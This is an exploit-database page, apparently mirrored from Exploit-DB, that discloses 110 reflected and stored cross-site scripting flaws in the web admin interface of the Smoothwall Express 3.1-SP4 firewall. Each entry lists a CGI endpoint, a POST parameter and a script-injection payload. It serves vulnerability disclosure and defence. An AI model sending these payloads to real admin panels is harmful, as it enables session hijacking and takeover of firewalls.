Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Smoothwall Express 3.1-SP4 - Cross-Site Scripting

🗓️ 11 Feb 2019 00:00:00Reported by Ozer GokerType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 61 Views

Smoothwall Express 3.1-SP4 Cross-Site Scriptin

Code
##################################################################################################################################
# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 |
Cross-Site Scripting
# Date: 06.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smoothwall.org
# Software Link: https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download
# Version: 3.1-SP4-polar-x86_64-update9
##################################################################################################################################

Introduction
The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface.


#################################################################################

XSS details: Reflected & Stored

#################################################################################

XSS1 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
CACHE_SIZE

PAYLOAD
'><script>alert(1)</script>

#################################################################################

XSS2 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_SIZE

PAYLOAD
'><script>alert(2)</script>

#################################################################################

XSS3 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MIN_SIZE

PAYLOAD
'><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_OUTGOING_SIZE

PAYLOAD
'><script>alert(4)</script>

#################################################################################

XSS5 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_INCOMING_SIZE

PAYLOAD
'><script>alert(5)</script>

#################################################################################

XSS6 | Stored

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
REDIRECT_PAGE

PAYLOAD
'><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
CHILDREN

PAYLOAD
'><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_SERVER

PAYLOAD
'><script>alert(8)</script>

#################################################################################

XSS9 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_FILE

PAYLOAD
'><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_ROOT

PAYLOAD
'><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
START_ADDR

PAYLOAD
'><script>alert(11)</script>

#################################################################################

XSS12 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
END_ADDR

PAYLOAD
'><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP1

PAYLOAD
'><script>alert(15)</script>

#################################################################################

XSS16 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP2

PAYLOAD
'><script>alert(16)</script>

#################################################################################

XSS17 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS1

PAYLOAD
'><script>alert(17)</script>

#################################################################################

XSS18 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS2

PAYLOAD
'><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME

PAYLOAD
'><script>alert(19)</script>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
MAX_LEASE_TIME

PAYLOAD
'><script>alert(20)</script>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DOMAIN_NAME

PAYLOAD
'><script>alert(21)</script>

#################################################################################

XSS22 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS_DOMAIN

PAYLOAD
'><script>alert(22)</script>

#################################################################################

XSS23 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS1

PAYLOAD
'><script>alert(23)</script>

#################################################################################

XSS24 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS2

PAYLOAD
'><script>alert(24)</script>

#################################################################################

XSS25 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_HOST

PAYLOAD
'><script>alert(25)</script>

#################################################################################

XSS26 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_DESC

PAYLOAD
'><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_MAC

PAYLOAD
'><script>alert(27)</script>

#################################################################################

XSS28 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_IP

PAYLOAD
'><script>alert(28)</script>

#################################################################################

XSS29 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
DOMAIN

PAYLOAD
'><script>alert(30)</script>

#################################################################################

XSS31 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
LOGIN

PAYLOAD
'"><script>alert(31)</script>

#################################################################################

XSS32 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
PASSWORD

PAYLOAD
'><script>alert(32)</script>

#################################################################################

XSS33 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(33)</script>

#################################################################################

XSS34 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'"><script>alert(34)</script>

#################################################################################

XSS35 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(35)</script>

#################################################################################

XSS36 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(36)</script>

#################################################################################

XSS37 | Reflected

URL
http://192.168.2.200:81/cgi-bin/time.cgi?

METHOD
Post

PARAMETER
NTP_SERVER

PAYLOAD
'><script>alert(37)</script>

#################################################################################

XSS38 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTLEVEL

PAYLOAD
'><script>alert(38)</script>

#################################################################################

XSS39 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
RTMIN

PAYLOAD
'><script>alert(39)</script>

#################################################################################

XSS40 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTDELAY

PAYLOAD
'><script>alert(40)</script>

#################################################################################

XSS41 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
TO

PAYLOAD
'><script>alert(41)</script>

#################################################################################

XSS42 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
ANNOY

PAYLOAD
'><script>alert(42)</script>

#################################################################################

XSS43 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSIP

PAYLOAD
'><script>alert(43)</script>

#################################################################################

XSS44 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSNAME

PAYLOAD
'><script>alert(44)</script>

#################################################################################

XSS45 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSPORT

PAYLOAD
'><script>alert(45)</script>

#################################################################################

XSS46 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
POLLTIME

PAYLOAD
'><script>alert(46)</script>

#################################################################################

XSS47 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSUSER

PAYLOAD
'><script>alert(47)</script>

#################################################################################

XSS48 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
NISPORT

PAYLOAD
'><script>alert(48)</script>

#################################################################################

XSS49 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSAUTH

PAYLOAD
'><script>alert(49)</script>

#################################################################################

XSS50 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL

PAYLOAD
'><script>alert(50)</script>

#################################################################################

XSS51 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
FROM

PAYLOAD
'><script>alert(51)</script>

#################################################################################

XSS52 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
CC

PAYLOAD
'><script>alert(52)</script>

#################################################################################

XSS53 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMSEMAIL

PAYLOAD
'><script>alert(53)</script>

#################################################################################

XSS54 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMTPSERVER

PAYLOAD
'><script>alert(54)</script>

#################################################################################

XSS55 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
PORT

PAYLOAD
'><script>alert(55)</script>

#################################################################################

XSS56 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
USER

PAYLOAD
'><script>alert(56)</script>

#################################################################################

XSS57 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL_PASSWORD

PAYLOAD
'"><script>alert(57)</script>

#################################################################################

XSS58 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(58)</script>

#################################################################################

XSS59 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT_SEL

PAYLOAD
'><script>alert(59)</script>

#################################################################################

XSS60 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT

PAYLOAD
'><script>alert(60)</script>

#################################################################################

XSS61 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(61)</script>

#################################################################################

XSS62 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_PORT_SEL

PAYLOAD
'><script>alert(62)</script>

#################################################################################

XSS63 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(63)</script>

#################################################################################

XSS64 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINE

PAYLOAD
'><script>alert(64)</script>

#################################################################################

XSS65 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINECOMMENT

PAYLOAD
'><script>alert(65)</script>

#################################################################################

XSS66 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(66)</script>

#################################################################################

XSS67 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(67)</script>

#################################################################################

XSS68 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(68)</script>

#################################################################################

XSS69 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(69)</script>

#################################################################################

XSS70 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
DEST_PORT

PAYLOAD
'><script>alert(70)</script>

#################################################################################

XSS71 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(71)</script>

#################################################################################

XSS72 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(72)</script>

#################################################################################

XSS73 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(73)</script>

#################################################################################

XSS74 | Reflected

URL
http://192.168.2.200:81/cgi-bin/timedaccess.cgi?

METHOD
Post

PARAMETER
MACHINES

PAYLOAD
'><script>alert(74)</script>

#################################################################################

XSS75 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_ADDRESS

PAYLOAD
'><script>alert(75)</script>

#################################################################################

XSS76 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_NETMASK

PAYLOAD
'><script>alert(76)</script>

#################################################################################

XSS77 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_DHCP_HOSTNAME

PAYLOAD
'><script>alert(77)</script>

#################################################################################

XSS78 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_ADDRESS

PAYLOAD
'><script>alert(78)</script>

#################################################################################

XSS79 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1_OVERRIDE

PAYLOAD
'><script>alert(79)</script>

#################################################################################

XSS80 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2_OVERRIDE

PAYLOAD
'><script>alert(80)</script>

#################################################################################

XSS81 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_MAC

PAYLOAD
'><script>alert(81)</script>

#################################################################################

XSS82 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_NETMASK

PAYLOAD
'><script>alert(82)</script>

#################################################################################

XSS83 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DEFAULT_GATEWAY

PAYLOAD
'><script>alert(83)</script>

#################################################################################

XSS84 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(84)</script>

#################################################################################

XSS85 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(85)</script>

#################################################################################

XSS86 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
NAME

PAYLOAD
'><script>alert(86)</script>

#################################################################################

XSS87 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT

PAYLOAD
'><script>alert(87)</script>

#################################################################################

XSS88 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT_SUBNET

PAYLOAD
'><script>alert(88)</script>

#################################################################################

XSS89 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT

PAYLOAD
'><script>alert(89)</script>

#################################################################################

XSS90 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT_SUBNET

PAYLOAD
'><script>alert(90)</script>

#################################################################################

XSS91 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET1

PAYLOAD
'><script>alert(91)</script>

#################################################################################

XSS92 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET2

PAYLOAD
'><script>alert(92)</script>

#################################################################################

XSS93 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(93)</script>

#################################################################################

XSS94 | Stored

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
filename

PAYLOAD
<script>alert(94)</script>

#################################################################################

XSS95 | Reflected

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
SOURCE_IP

PAYLOAD
"><script>alert(95)</script>

#################################################################################

XSS96 | Stored

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
FILTER

PAYLOAD
'><script>alert(96)</script>

#################################################################################

XSS97 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipinfo.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(97)</script>

#################################################################################

XSS98 | Reflected

URL
http://192.168.2.200:81/cgi-bin/iptools.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(98)</script>

#################################################################################

XSS99 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
WRAP

PAYLOAD
'><script>alert(99)</script>

#################################################################################

XSS100 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
SECTIONTITLE

PAYLOAD
'><script>alert(100)</script>

#################################################################################

XSS101 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
INIT

PAYLOAD
'><script>alert(101)</script>

#################################################################################

XSS102 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
HANGUP

PAYLOAD
'><script>alert(102)</script>

#################################################################################

XSS103 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_ON

PAYLOAD
'><script>alert(103)</script>

#################################################################################

XSS104 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_OFF

PAYLOAD
'><script>alert(104)</script>

#################################################################################

XSS105 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TONE_DIAL

PAYLOAD
'><script>alert(105)</script>

#################################################################################

XSS106 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
PULSE_DIAL

PAYLOAD
'><script>alert(106)</script>

#################################################################################

XSS107 | Reflected

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TIMEOUT

PAYLOAD
'><script>alert(107)</script>

#################################################################################

XSS108 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(108)</script>

#################################################################################

XSS109 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
KEYMAP

PAYLOAD
'><script>alert(109)</script>

#################################################################################

XSS110 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
OPENNESS

PAYLOAD
'><script>alert(110)</script>

#################################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Feb 2019 00:00Current
7.4High risk
Vulners AI Score7.4
smoothwall expresscross-site scriptingxssreflectedstoredsecuritylinuxweb interfacepost methodcgi-binurlfilterdhcp
61